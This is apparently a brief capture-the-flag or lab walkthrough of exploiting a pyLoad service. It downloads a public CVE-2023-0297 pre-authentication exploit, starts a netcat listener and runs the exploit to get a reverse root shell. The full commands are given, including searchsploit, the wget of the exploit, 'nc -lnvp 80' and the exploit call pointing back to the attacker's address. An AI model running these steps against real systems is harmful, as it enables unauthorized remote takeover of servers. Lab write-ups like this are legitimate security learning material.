http:

Found one login page here.

Default password like admin:admin didn't work here.

On doing google search for pyload exploit. I found one pre-authentication exploit.

searchsploit -m 51532

The command didn't give any output after running, so I cannot confirm whether it ran or not.

python3 51532.py -u http://$pyloader:9666 -c id

Let's try getting shell.

Other exploit.

wget https://raw.githubusercontent.com/JacobEbben/CVE-2023-0297/refs/heads/main/exploit.py

Let's try this.

Start the listener at port 80.

sudo rlwrap -cAr nc -lnvp 80

Run the exploit.

python3 exploit.py -t http://$pyloader:9666 -I $IP_KALI -P 80

GOt the shell as root user.

Last updated 1 year ago